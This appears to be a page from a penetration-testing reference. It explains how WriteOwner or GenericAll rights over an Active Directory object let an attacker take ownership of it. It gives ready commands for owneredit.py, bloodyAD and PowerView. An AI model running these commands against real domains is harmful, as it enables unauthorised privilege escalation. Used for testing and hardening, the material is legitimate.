GrantOwnership
the following command-line arguments.This abuse can be carried out when controlling an object that has WriteOwner or GenericAll over any object.
The attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. For instance, the attacker could change the target object's permissions and grant rights.
From UNIX-like systems, this can be done with Impacket's owneredit.py (Python).
⚠️ At the time of writing, May 14th 2022, the Pull Request (#1323) is still pending. so you have to find the request yourself and add it
owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'Alternatively, it can be achieved using bloodyAD
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set owner $TargetObject $ControlledPrincipalWindows
From Windows systems, this can be achieved with Set-DomainObjectOwner (PowerView module).
Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'Last updated